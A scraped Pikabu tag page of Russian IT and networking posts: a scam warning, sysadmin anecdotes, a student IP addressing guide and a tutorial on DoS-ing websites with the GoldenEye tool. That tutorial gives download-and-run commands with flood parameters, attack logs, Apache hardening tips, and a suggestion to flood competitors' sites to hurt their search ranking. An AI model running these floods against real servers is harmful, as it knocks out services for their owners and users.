Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр
🔮✨Волшебство, любовь… и шерсть на одежде!
Ищи улики, решай головоломки — и помни: каждый твой шаг меняет ход сюжета.

Мой Любимый Кот

Новеллы, Головоломки, Коты

Играть

Топ прошлой недели

  • AlexKud AlexKud 38 постов
  • SergeyKorsun SergeyKorsun 12 постов
  • SupportHuaport SupportHuaport 5 постов
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня

IT + Сеть

С этим тегом используют

Программирование IT юмор Программист Юмор Работа Картинка с текстом Разработка Интернет Не мое Wi-Fi Компьютер Помощь Все
113 постов сначала свежее
2
venetasystem
venetasystem
6 лет назад

ОСТОРОЖНО, МОШЕННИКИ: КАК НЕ СТАТЬ ЖЕРТВОЙ ВЫМОГАТЕЛЯ В СЕТИ⁠⁠

ОСТОРОЖНО, МОШЕННИКИ: КАК НЕ СТАТЬ ЖЕРТВОЙ ВЫМОГАТЕЛЯ В СЕТИ Интернет, Мошенничество, Информационная безопасность, Сети, Юмор, IT, Длиннопост

На «тестовый» почтовый ящик нашей компании пришло письмо. Автор пишет, что он – хакер, взломавший почту и собравший «компромат». За молчание вымогатель потребовал ни много, ни мало, а 840 долларов! Непременно в криптовалюте. Текст составлен на английском, а само письмо отправлено как будто с нашей же почты. Чудеса, да и только.


Мошеннику не на что рассчитывать: аккаунт принадлежит несуществующему персонажу и к сожалению для «хакера», наш виртуальный герой не проявляет никакой активности в интернете. Такие письма шантажистов рассылаются массово. Один из ста пользователей, наверняка, попадается на подобные уловки.


Если бы на компьютер действительно попал хакерский вирус, то на экране всплыл бы «баннер». В таком случае информация перекодируется в файлы, которые невозможно открыть. Тогда хакеры высылают «раскодировку» за вознаграждение. Однако и в этом случае легко столкнуться с мошенничеством дважды: заплатить деньги, но так и не получить данные.


– Спасти информацию от хакеров практически нереально, если нет бэкапов. Бэкап – это сохранение того, что есть у вас на компьютере в архиве. Данные нужно сохранять на внешнем носителе. Например, жестком диске. Это вас обезопасит. А это письмо, такое ощущение, что составил ребенок. Просто не реагируйте на подобные сообщения! – прокомментировал руководитель отдела ремонта компьютерной техники «Clever Bros.» Сергей Лисовский.


Будьте бдительны и не поддавайтесь на уловки мошенников. Спасибо автору этого шедевра, посмеялись от души.

ОСТОРОЖНО, МОШЕННИКИ: КАК НЕ СТАТЬ ЖЕРТВОЙ ВЫМОГАТЕЛЯ В СЕТИ Интернет, Мошенничество, Информационная безопасность, Сети, Юмор, IT, Длиннопост
ОСТОРОЖНО, МОШЕННИКИ: КАК НЕ СТАТЬ ЖЕРТВОЙ ВЫМОГАТЕЛЯ В СЕТИ Интернет, Мошенничество, Информационная безопасность, Сети, Юмор, IT, Длиннопост
Показать полностью 2
[моё] Интернет Мошенничество Информационная безопасность Сети Юмор IT Длиннопост
15
58
Carb0f0ss
Carb0f0ss
6 лет назад

Я незаменимый специалист IT 2⁠⁠

Я незаменимый специалист IT 2 IT, Администрирование, Сети

Перечитав кучу комментов к своей статье "Я незаменимый специалист IT", ссылка https://pikabu.ru/story/ya_nezamenimyiy_spetsialist_it_60987... , я понял одно. По большинству комментов я  понял, что надо держать сетку на одном дыхании с админом, типа уходит админ и сеть падает сама... Наверно она очень загоревала по папке и решила что сейчас вот прямо на второй день сдохну!

О чем хотел написать: Прошло уже как 4 года с тех пор как я уволился с прежнего места работы, после меня, спустя 2 месяца, нашли все-таки местного паренька. По сей день у них на работе стоит гипервизор на двух нодах, крутится 4 виртуалки, и вся сеть ходит и работает без сбоя! Уже почти четыре года! И даже прошлый руководитель до сих пор мне жмет руку при встрече! Объясните пожалуйста, суровые админы...  что я сделал не так...

Показать полностью
[моё] IT Администрирование Сети
64
245
DELETED
7 лет назад

ИТ против традиций.⁠⁠

Поскольку нашлись любители историй про ИТшников. Расскажу еще про еще один "объект". Лучшая реклама, это сарафанное радио. И тут один из руклей передал контакт "конторе". Конторка так себе.

Инфраструктура:

4 компа , на одном стояла базы 1с расшарены по сетке и три к ней подключены. (2 буха деревянные, одна соображающая, И "ГЛАВ"!) вели они разные организации и по каждой отчитывались перед "диром".

Сами понимаете приоритет по мощностям у реальной машины сетевые вторичны (хотя и так туго работали) "Главный" был у "глава".

А стояло у них следующее:

Сервер 2008 Стандарт +5 Юзверей) а работали в банальной расшарке.

Ну первое перекинул юзверей в RDP (докупив 3 Usercal)

Девки ободрились...

Работа полетела. Директор рад.

Проходит 2 дня. Звонят: Сети нет.(понимаю из разговора Свитч поломался или сетевухи сдохли а у трех просто не реально)...

Приезжаю. Свитч реально поломался. Вот прям до самой платы дырка была... "Глав объяснила что упал цветник на данное чудо техники"

Ну делаю замену (за счет клиента) все опять полетело...

Проходит еще два дня....

Звонок. Звонит бухгалтерша из тех кто поумней. И говорит о том что сервера не видит , интернет не работает..

Приезжаю. Кабель не подает признаков жизни. Иду по кабелю... И что вы думаете я увидел? Перерезанный UTP... почти у самого роутера..

Я к директору...Мол так и так диверсия. Мне не верят.

Переобжимаю кабель. И уезжаю. Через часов 5 звонок. От той же бухгалтерши. Опять не работает.

Приезжаю. Опять тоже самое... только перерезан на середине. Перетянул кабель(благо не далеко).

Опять к диру.... Ну он опять не верит, и я чувствую сомнения от директора в своей компетентности.

Поставил камеру.... и через 2 дня попала на видео "ГЛАВ" которая резала кабель.

Приехал первым делом к директору. Показал "поломку". Он "ГЛАВА" отфигачил.

И оказывается.... пока глав имел преимущество в скорости... она первая бегала с какими-то отчетами... Когда шансы уровнялись, тогда тот бух который был прошаренным подавал все быстрее. К ней стал прислушиваться директор и "глав" ничего не придумала кроме как саботаж.... До сих пор дружу с той "конторой". А "глав" свалила через месяц после той истории. Глав теперь там та прошаренная. Новых не брали. Справляются втроем...

Показать полностью
[моё] IT Длиннопост Текст Сети
30
timohius
timohius
7 лет назад

Ошибка загрузки файлов размером больше ~70kb⁠⁠

Всем привет!

Возникла проблема следующего характера:


При загрузке файлов на таких ресурсах как vk и gmail происходит ошибка и файл перестает загружаться. В консоли браузера пишет 2 ошибки друг за другом


1)ERR_SSL_BAD_RECORD_MAC_ALERT


2)ERR_CONNECTION_RESET


Данная проблема наблюдается с файлами в размере свыше ~60kb(вывел экперементальным путем).


Предвосхищая вопросы сразу отмечу


1)В гугле искал, ничего путного не нашел.


2)У меня дуал бут (линь+винда) эта ошибка и там и там.


3)Имеется две сетевых карты, вай-фай и lan ошибка присутствует и там и там.


4)Если подключиться не к домашнему вайфаю, а к вайфаю розданному с телефона все будет в ажуре и работает замечательно.


5)Я подумал что проблема кроется в домашнем роутере. Подключился с ноута, а не со своего ПК. Но на нем подобной проблемы не наблюдается.


6)Да, я удалял все расшиерния из браузера, устанавливал драйвера сетевые, пробовал в разных браузерах и тд.



Вероятнее всего проблема где-то в связке между пк и роутером, но в чем, я не могу понять. Вообщем HELP!


P.S.

Комменты для минусов присутствуют

Показать полностью
IT Интернет Ошибка Сети Linux Windows Текст
30
203
virrasha
virrasha
7 лет назад
Лига Сисадминов

План адресации в учебных сетях - выдумка или реальность⁠⁠

С одной стороны, пост скорее для студентов. С другой же стороны, многие состоявшиеся специалисты никогда не задумывались о такой простой вещи, как адресация в учебных сетях.

Всё, что я здесь напишу – это сугубо моё личное мнение, которое не претендует на истину в последней инстанции. И да, тут будет много поясняющей воды.


Зайду издалека. Если вы проходите что-то связанное с сетями (или посещаете курсы, а может просто решили сварганить тестовую среду с друзьями под пивко), то рано или поздно дело доходит до практики – построения сети на живом оборудовании или во всяких там эмуляторах. Я сейчас буду рассматривать пример лабораторной в университете/на курсах. Итак, на доске рисуется некоторая схема сети, а дальше у нас два варианта:


1) Преподаватель расписывает всю-всю адресацию (рис.1)


2) Преподаватель расписывает концептуальное задание, а адресация остается на ваше усмотрение (рис.2)

План адресации в учебных сетях - выдумка или реальность Системное администрирование, Сети, Для начинающих, IT, План, Длиннопост
План адресации в учебных сетях - выдумка или реальность Системное администрирование, Сети, Для начинающих, IT, План, Длиннопост

Первый вариант понятен – за нас уже подумали. Но не факт, что хорошо (и мы всегда можем предложить свой вариант с преферансом и гимназистками – вдруг прокатит). Рассмотрим плюсы и минусы конкретного примера с рисунка 1 (синие кружки – хосты, оранжевое – линки, зеленое – сеть на самом хосте и «за ним»).


Плюсы:

1) Препод делал эту лабу раз 800 именно в таком виде и может отдебажить с закрытыми глазами

2) Возможно, у него уже написана методичка под эту адресацию.

3) В принципе, одинаковые IP для хостов (192.168.х.1) – это удобно.


Вообще, на мой взгляд, плюсы на этом заканчиваются (да и то: два из них для преподавателя, а третий сомнителен) и начинается полная Ж для нас:


1) Если вы видите и делаете эту лабу первый раз, у вас все десятые айпишники сливаются перед глазами. Мы делали во второй раз – просто при конфигурации интерфейсов на 4 человека и восемь интерфейсов было сделано три ошибки с перепутанной единичкой/двойкой.

2) При прописывании маршрутов эти описки множатся

3) Дебажить – просто ад. Постоянно пялиться на схему, сверять сети. Сети опять сливаются перед глазами. На слух тоже плохо воспринимаются адреса.

4) При усложнении конфигурации (добавлении пары ликнов, как на рис.2) вообще пропадает логика адресации. Только схема, только хардкор.


Подход, тем не менее, очень часто используется и имеет право на жизнь. Но теперь представьте, что вы уже не на первом курсе. У вас не 4 хоста, а 14, по числу студентов в группе и соединены они не по кругу, а как попало (рис.3). И задачи у вас посложнее.

План адресации в учебных сетях - выдумка или реальность Системное администрирование, Сети, Для начинающих, IT, План, Длиннопост

Немного вбоквел. На прошлой неделе я счастливо посещала курсы, на которых мы в очередной раз не сошлись с преподавателем в некоторых концептуальных вопросах. Его мнение – не стоит тратить время на такие глупости, как выбор толкового плана адресации, не надо усложнять, надо скорее делать, так как время не резиновое. Моё мнение – один раз расписать логику адресации (я делаю это уже на автомате и быстро), зато снизим ошибки конфигурации и облегчим дебаг. Победил преподаватель, расписав схему а-ля рис.1. Роман, если читаешь, извини, что я так громко возмущалась, но я до сих пор не согласна. Конец вбоквела.


Сейчас несколько общих советов, годных для любого плана адресации:


1) План адресации вам всё-таки нужен, иначе обязательно пойдут пересечения сетей, особенно «популярных», вроде 10.1.1.0/24


2) Выбирайте строго одного человека, который выберет план адресации, пусть даже хреновый. Время принятия решения возрастает в степени количества участников (один человек – 5 минут, 3 человека – 5^3=125 минут)


3) Не мельчите сетки и указывайте популярные маски, если иное не обозначено условиями задачи. В учебной сети нет цели сэкономить адреса. Помните, что вокруг вас люди, которые даже с калькулятором сетей не особо представляют себе, как одна сетка /25 делится на две /26. Короче, /24 – ваш безусловный выбор (если только вы не проходите тему агрегации сетей).


Теперь посмотрим на рис.4 – Это бывший рис.2 с расписанной альтернативной адресацией. И сейчас будут конкретные советы.

План адресации в учебных сетях - выдумка или реальность Системное администрирование, Сети, Для начинающих, IT, План, Длиннопост

В данном случае, план адресации сформулирован правилами:


1) На сеть между двумя хостами X и Y назначается адрес вида 10.1.XY.0/24, где X – номер меньшего по номеру хоста, а Y – адрес большего по номеру хоста.

2) На хост X назначается адрес 10.1.XY.Х/24, на хост Y адрес 10.1.XY.Y/24

3) VLAN между хостами имеет номер XY

4) Адрес сети за хостом имеет адрес вида 192.168.100+X.0/24

5) Адрес хоста во внутренней сети назначается 192.168.100+X.Х/24


Эта сеть легко расширяется. 100+Х мы брали, чтоб не пересечься с популярной дефолтной сеткой 192.168.1.0/24, на которой, скорее всего, висит сеть с инетом.


А внимательный пикабушник посмотрит на рисунок 3 и скажет, что данная схема нормально расширяется только до 9 хостов, а дальше мы имеем вероятность вылезти за рамки числа 254 в XY. НО! У нас же остался неиспользованный октет!


В сети более, чем на 9 хостов используйте правила:


1) На сеть между двумя хостами назначается адрес вида 10.X.Y.0/24, где X – номер меньшего по номеру хоста, а Y – адрес большего по номеру хоста.

2) На хост X назначается адрес 10.X.Y.Х/24, на хост Y адрес 10.X.Y.Y/24


Пример с рис.3: На линке между 12 и 9 хостами будет сеть 10.9.12.0/24, на 9ом будет адрес 10.9.12.9/24, а на 12ом 10.9.12.12/24.


И ещё несколько советов:

1) Используйте как можно более разные сети для связей разной природы. Скажем, 10.1.XY.0/24 для физических линков, а 172.16.XY.0/24 для навешивания на GRE туннели.

2) В схеме 10.X.Y.0/24 у вас еще есть запас сетей 10.100+X.100+Y.0/24

3) Аккуратно относитесь к номерам VLAN, если нумеруете хосты с нуля. VLAN 1 занят под native. И за к номерам за 1000 тоже аккуратно относитесь, лучше сделать пару исключений из логики, если пошли такие VLAN’ы.


Что мы получаем: Зная только номера хостов соседей можно спокойно расписывать себе адреса, пока они там телятся. Глядя только на схему с хостами и связями, можно прописывать на своей стороне уже всё, что надо (и не надо расписывать на доске адресацию по всем 14 хостам). В любом месте, запуская tcpdump (или аналог), мы по прилетающим адресам точно можем сказать, откуда они прилетели и быстро найти это место.


На мой взгляд, удобная и хорошо масштабируемая в рамках учебных задач схема.


Собственно, вот и всё, чем хотелось поделиться. Выбирать из этих или придумывать свой вариант – решать вам.

Показать полностью 4
[моё] Системное администрирование Сети Для начинающих IT План Длиннопост
221
3
4sysadmins4
7 лет назад

DoS веб-сайта в Kali Linux с GoldenEye⁠⁠

В предыдущей статье уже говорилось об инструменте

DoS, который может сильно нагрузить серверы HTTP, чтобы парализовать их работу из-за исчерпания пула ресурсов. GoldenEye — это ещё один, со своими особенностями, который может положить сервер за 30 секунд, в зависимости от того, насколько велик пул его памяти. Конечно, он не работает на защищённых серверах и серверах за

правильно настроенными WAF, IDS. Но это отличный инструмент для тестирования

вашего веб-сервера на повышенную нагрузку. А на основании полученных результатов

можно изменить правила iptables/файерволов для увеличения устойчивости и

сопротивляемости к негативным факторам.

Подробности об инструменте GoldenEye:

Название утилиты: GoldenEye

Автор: Jan Seidl

Веб-сайт: http://wroot.org/

Из поста автора GoldenEye:

1. Этот инструмент предназначен только для целей исследования и любое другое

вредоносное его использование запрещено.

2. GoldenEye — это приложение на питоне для ТОЛЬКО ЦЕЛЕЙ ТЕСТИРОВАНИЯ

БЕЗОПАСНОСТИ!

3. GoldenEye это инструмент тестирования HTTP DoS.

4. Эксплуатируемый вектор атаки: HTTP Keep Alive + NoCache

Типы DoS или DDoS атак

Давайте пройдёмся по самой базовой информации об атаках DoS или. DDoS. Обычно

выделяют три вида DoS и DDoS атак:

1. DoS и DDoS атаки уровня приложений

2. DoS и DDoS атаки уровня протокола

3. DoS и DDoS атаки насыщения полосы пропускания

DoS и DDoS атаки уровня приложений

DoS и DDoS атаки уровня приложений — это атаки, которые нацелены на Windows,

Apache, OpenBSD или другое программное обеспечение для выполнения атаки и краха

сервера.

DoS и DDoS атаки уровня протокола

DoS и DDoS атаки уровня протокола — это атаки на уровне протокола. Эта категория

включает Synflood, Ping of Death и другие.

DoS и DDoS атаки насыщения полосы пропускания

Этот тип атак включает ICMP-флуд, UDP-флуд и другие типы флуда, осуществляемые

через поддельные пакеты.

Слова DoS и DDoS близки по значению. Когда атака ведётся с одной машины, обычно

говорят о DoS атаке. При большом количестве атакующих из ботнета (или группы)

говорят о DDoS атаке. Об этих атаках доступно много информации, но не важна, какого

типа эта атака, т. к. они все одинаково вредны для сервера/сети.

Загрузка GoldenEye

Сторонние программы, установленные не из репозитория, я собираю в каталоге ~/opt.

Если у вас нет каталога для сторонних программ, то создайте его и перейдите туда:

1| mkdir opt

2| cd opt

Следующая большая команда создаст каталог, загрузит туда последнюю версию

GoldenEye, распакует архив и сразу запустит GoldenEye (покажет справку по

программе):

1| mkdir GoldenEye && cd GoldenEye && wget

https://github.com/jseidl/GoldenEye/archive/master.zip && unzip master.zip && cd

GoldenEye-master/ && ./goldeneye.py

Если вам хочется всё сделать самому — постепенно, то продолжаем. Для начала

создаём каталог GoldenEye, переходим туда и скачиваем архив с программой:

1| root@WebWare-Kali:~/opt# mkdir GoldenEye

2| root@WebWare-Kali:~/opt# cd GoldenEye

3| root@WebWare-Kali:~/opt/GoldenEye# wget

https://github.com/jseidl/GoldenEye/archive/master.zip

После скачивания распаковываем файл архива master.zip.

1| unzip master.zip

Теперь у нас появился каталог GoldenEye-master, переходим туда и проверяем его

содержимое:

1| ls

2| cd GoldenEye-master/

3| ls

Запуск GoldenEye – досим веб-сайт

Запуск очень прост, делается это так:

1| ./goldeneye.py

Программа показывает нам свою справку:

Необходимо осведомлять пользователей о расписании тестирования и возможных

перебоях в работе. Поскольку часто результатом симуляции атаки является остановка

работы.

Ну и все другие предупреждения: вы не должны тестировать (симулировать атаку)

других без их разрешения. Поскольку в случае причинения вреда, вы можете быть

привлечены к ответственности в соответствии с законодательством.

Данная информация размещена в образовательных целях. Для тестирования своих

серверов, для анализа качества их настройки и разработки мер противодействия

атакам.

Запуск слегка различается от используемой вами ОС:

1| root@WebWare-Kali:~/opt/GoldenEye/GoldenEye-master# ./goldeneye.py

http://www.goldeneyetestsite.com/

(или)

1| sudo ./goldeneye.py http://www.goldeneyetestsite.com/

(или)

1| python goldeneye.py http://www.goldeneyetestsite.com/

В зависимости от того, где вы сохранили файлы, подредактируйте ваш путь и команду.

Далее тесты GoldenEye:

Следить за состоянием сервера я буду командой top:

Т.е. сервер находится в состоянии простоя, процесс полностью свободен, свободной

оперативной памяти доступно 350 мегабайт.

Атака

1| ./goldeneye.py http://192.168.1.37/info.php

Результат

Можно посмотреть по скриншоту, процессор по-прежнему практически бездействует,

но количество свободной памяти резко сократилось, увеличилось количество спящих процессов.

Тем не менее, сервер не удалось полностью положить при атаке в один поток (хотя

вообще-то, такая задача и не ставилась).

Анализ атаки GoldenEye

Посмотрим лог сервера:

1| cat /var/log/apache2/access.log | grep -E '192.168.1.55'

Я использую grep -E '192.168.1.55', чтобы отфильтровать подключения только с

машины, с которой велась атака.

Видим там примерно такое:

1| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?vySSDx=tG1rmfX4HbYXBm&CKVuvV=JLoK&nHc8x=0x5YKQtvHs0HWS68

HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3)

AppleWebKit/535.6 (KHTML, like Gecko) Version/6.0.5 Safari/535.17"

2| 192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET

/info.php?dC1FyXpw=hB6Oh&rjcf74A=YVA&YUtUXuDo2s=2pLY7nlq&SjyqoF=wUIx8Aq&tXkr

fJRw=LsgED HTTP/1.1" 200 69504 "http://www.baidu.com/k1IkNXv" "Mozilla/5.0

(Macintosh; Intel Mac OS X 11_0_4) AppleWebKit/536.12 (KHTML, like Gecko)

Chrome/10.0.623.89 Safari/536.26"

3| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?0Nk7p=kSf&1eVF8PNy=UpDtxpDmJE2Fbx6&lPS=53T0AUI6Xu&5EbHY=scv1yBq8O

6Y&JJthAkQqqk=HUEQBD5ONbAMxVlWHxai HTTP/1.1" 200 69504 "-" "Mozilla/5.0

(Windows NT 5.1; WOW64) Gecko/20021304 Firefox/12.0"

4| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?SAQMIx5Pl=VWGEFj3q8N0

HTTP/1.1" 200 69504

"http://www.google.com/gCqMk2Q05?DxQe=67gW4HUd3iTKCu2qWSJ&amp...

Gh6q2sVlyHBdK&bl185B=anwKamnu2xK&RpI=HA0wNexUytc&uOqLV=6TNbGepqbnr&uu2fj

tL63=u5lnA701na4cYYH0yN&TOY066XT=3WJQhmtXRyCo46HnbXY1" "Mozilla/5.0 (Linux

x86_64; X11) Gecko/20010905 Firefox/17.0"

5| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?jA5Kw=fwtSMfaPQ8XtCaK&Y0fBbDfSXd=8Jm5hqt&xPC=1qwBHvMDy7gl

HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64) Gecko/20011709

Firefox/23.0"

6| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?t2U0aYjxm=q21n4BARB1&qxI1=cTw&XjGPpG=W3AAWvebbW HTTP/1.1" 200

69504 "http://www.baidu.com/bQnoS7ULAY" "Mozilla/5.0 (Windows NT.6.2; Win64; x64)

AppleWebKit/536.10 (KHTML, like Gecko) Chrome/18.0.1844.44 Safari/537.21"

7| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?nkIkop=6pivICjNb6&U3Y=dDlbGnW3feTEXCm&aH2JLMl=sGmkpeSLnTtXahs7agi&

8htjBss=DFuXcUiJ5G5Fu7c HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (compatible; MSIE 10.0;

Macintosh; .NET CLR 3.0.8867; Intel Mac OS X 11_6_2)"

8| 192.168.1.55 - - [18/Jun/2015:17:06:48 +0700] "GET

/info.php?p6P23Hj=IcVgaSIUoVTanmFIDan&WWml82r3D=TCY8rta5YrwVsLJmrM HTTP/1.1"

200 69504

"http://www.baidu.com/fWaBwllK?aNP85MesWv=VhL6v32qtwyj&6C...

YXmLk2w&Uy3wv=4pvNH8y&Jvirs=RJ4hKfRa&HyIYt8gtP=CHjm8OJaOP2djoQS&rm7bH=rukJ

4726B14D3XOxDwJ6&QBkOD3=33qpPxVM3ih76MaSgnT&s7gO=3WrX3Vd&Vsh=A13d"

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_4_1) AppleWebKit/536.10 (KHTML, like Gecko)

Chrome/15.0.1172.45 Safari/535.15"

9| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?so64O=2GhoHQaFy&DSmxwEWk=tYxV&y1C7mM=kQbuxco5oJfLPocGLl&kbItk4Rl

j=LjVhrLgelmtLYDuldfF HTTP/1.1" 200 69504

"http://192.168.1.37/uxNqvi6EnN?cAyrBjvKc=OsSGuqs&rrlLD=2..." "Mozilla/5.0

(Windows; U; MSIE 10.0; Windows NT 5.1; .NET CLR 2.2.16303; Win64; x64)"

10| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?EXRbe03wp=fEBV5exjikcr8oNbEkmN&vpg8wYXv=DMGpYP1RMBUglSjbv4g&55prJ

=fY78WvDU3vW7GaoW4etN&JWEFmlYFU=yFyBEk7 HTTP/1.1" 200 69504 "-" "Mozilla/5.0

(Windows; U; MSIE 8.0; Linux x86_64; .NET CLR 1.0.1395; X11)"

11| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?7xIRdP0=8mjyacN&kEd2MwYtJ=bWhJvAH3A1H&xWe7vp6nH=faGl3PGJ4xAf&dSn

j5CW=wOBRfkLbMrEWdmMFvov&xWPL3sYb=WN0yYPXu HTTP/1.1" 200 69504 "-"

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_0) Gecko/20062612 Firefox/18.0"

12| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?lVn80y605=IDRbDmoiDyNBu

HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_4) Gecko/20052008

Firefox/18.0"

13| 192.168.1.55 - - [18/Jun/2015:17:06:52 +0700] "GET

/info.php?mAthtfI=c4QdAopYyQGAsJAl0XUH HTTP/1.1" 200 69504

"http://www.yandex.com/jbOJRnhpii?fW4YmYLq=6A6f8qyxLRk6" "Mozilla/5.0 (Linux i386;

X11) AppleWebKit/536.27 (KHTML, like Gecko) Version/4.1.4 Safari/537.21"

14| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?1nwS7r=g6qpYcfOre

HTTP/1.1" 200 69504 "-" "Mozilla/5.0 (Linux i386; X11) Gecko/20053002 Firefox/15.0"

15| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?00iHfl2=CGhueehx3DqR32D&MnPMIcqiTN=HcIR&GFgFaO=IJL HTTP/1.1" 200

69504 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_3_3) AppleWebKit/535.29 (KHTML,

like Gecko) Chrome/19.0.1233.51 Safari/536.18"

16| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET /info.php?Ml1k=DFVW0F7 HTTP/1.1"

200 69504 "-" "Mozilla/5.0 (Linux i386; X11) AppleWebKit/537.1 (KHTML, like Gecko)

Chrome/8.0.1320.86 Safari/535.21"

17| 192.168.1.55 - - [18/Jun/2015:17:06:51 +0700] "GET

/info.php?khUn=xnRp0gXjlF&bl8TpeXEF5=28W&wPkB=cnOPTgwOpPGC&12cnFT6b=XNDSX

FPdtraDsR&0FqigAn62=Kl4Y7pj2e7lj0nGoGN HTTP/1.1" 200 69504 "-" "Mozilla/5.0

(Windows NT.6.2; Win64; x64) AppleWebKit/537.3 (KHTML, like Gecko) Version/5.1.2

Safari/536.32"

Одного взгляда на логи достаточно, что каждый запрос GET содержит различные

строки, различные пользовательские агенты и различных реферов, среди которых Bing,

Baidu, Yandex и другие рандомные поисковые системы.

Так что происходит, когда ваш веб-сервер встречается с этой атакой? Он анализирует

входящий трафик, проверяет запрашиваемые URL, адреса источников и поле Referrer и пропускает их с кодом 200 OK. Почему? Потому что каждый браузер был различным.

Инструмент был создан остроумно так, чтобы любой сервер мог подумать, что это

различные пользователи, пытающие зайти с одного IP (может быть IP прокси или

большой организации?) с различными браузерами (Firefox, Chrome, MSIE, Safari и т. д.),

различными операционными системами (Mac, Linux, Windows и т.д.) и даже с

различными реферами. Да, возможно запрашиваемый URL был неправильным, но

нормальные веб-сервера всё равно пропустят его, перенаправят на страницу ошибки в

то время как соединение будет оставаться открытым (например, Apache worker/socket).

Стандартный веб-сервер обычно позволяет X число одновременных пользователей с

одного IP и с большим количеством соединений/используемых сокетов, этот тип атаке

приводит к тяжёлому давлению на сервер и последующие пользователи получают

ошибку (HTTP 503 или наподобии). Следовательно, атакующий с несколькими

рандомными proxy/VPN может быстро истощить ресурсы сервера. Он даже может

замедлить атаки на один IP для избежания начального выявления:

1| root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py

http://www.goldeneyetestsite.com/ -w 10 -s 10 -m random

Вышеприведённая команда использует:

-w = 10 одновременные рабочие

-s = 10 одновременных соединений

-m = рандом, смесь GET и POST

Совершенный DoS!

Интересное наблюдение по Google Analytics и GoldenEye

Я попробовал это в живую, чтобы просто посмотреть, как поведёт себя реальный веб-

сервер. Интересно, оказывается что Google Analytics воспринимает этот трафик как

реальный и добавляет данные от флуда в статистику (хотя он и идёт с одного IP, но

различные рефереры и браузеры убеждают Google в том, что это отдельные

пользователи). Можно придумать ещё пару способов эксплуатировать это:

 Можно повышать свой рейтинг в Google, т. к. она будет воспринимать это как

легитимный трафик.

 Если Google будет наказывать за это, то тогда можно зафлудить веб-сайты

конкурентов для понижения их ранжирования в Google.

Эта палка о двух концах.

Блокирование/защита от атаки GoldenEye

Следующие предложения хорошо сработают, когда вы используете Apache:

1. Понижение соединений на один IP (обычно их 300 на IP для Apache)

2. Редактирование порога соединений на IP

3. Отключить настройки KeepAlive и нижний Connection Timeout (по умолчанию это

300)

4. Если вы хоститесь на общем сервере, обратитесь к сисадминам. Если они не

могут защитить от этой простой атаки, то просто переезжайте к хостинг

компании получше.

5. Используйте Web application Firewall (WAF).

6. Использование белых листов для входящих запросов — и эта атака не окажет

эффекта на ваш сервер.

7. NGINX и Node.js вроде бы лучше справляются с атаками подобного рода.

Заключение

GoldenEye выглядит как расширенная (или схожая на) HTTP Flooder программа. Обе

работают похожим образом, но NoCache и KeepAlive от GoldenEye делают большую

разницу. Также она использует интересный способ перемешивания браузеров,

операционных систем и рефереров, что может обмануть файервол.

В общем, это хороший инструмент для тестирования на нагрузку своего собственного

веб-сайта (с разрешения вашей хостинг компании), вашего корпоративного веб-сайта и

любых веб-приложений, которые позволяют входящие GET или POST запросы.

Используйте её для обновления ваших правил файервола. WAF и благодаря

этому избежите будущих атак.


Источник: Telegram канал "IT-Специалист" t.me/to_sysadmins

Показать полностью
Linux DDoS Хакеры IT Взлом Безопасность Сети Тест Длиннопост Текст
1
L0z4
L0z4
7 лет назад

Лет 15 назад эта шутка была на баше, сегодня оказалось что это не шутка.⁠⁠

Лет 15 назад эта шутка была на баше, сегодня оказалось что это не шутка.
Сети Дом Wi-Fi IT Интернет-провайдеры Bash im
2
9
Venombro
7 лет назад

Новая СКС⁠⁠

Вот что мы нашли под плиточным потолком, к слову подрядчик только что сдал здание в эксплуатацию.

Новая СКС СКС, IT, Сети, Продо, Витая пара, Тыжпрограммист

Похожие "мины" были найдены и не раз, кто знает сколько их всего.


БМ ругался на застрявшую в грязи машину. 31% похожести, а Вам как кажется?)

[моё] СКС IT Сети Продо Витая пара Тыжпрограммист
14
Посты не найдены
О нас
О Пикабу Контакты Реклама Сообщить об ошибке Сообщить о нарушении законодательства Отзывы и предложения Новости Пикабу Мобильное приложение RSS
Информация
Помощь Кодекс Пикабу Команда Пикабу Конфиденциальность Правила соцсети О рекомендациях О компании
Наши проекты
Блоги Работа Промокоды Игры Курсы
Партнёры
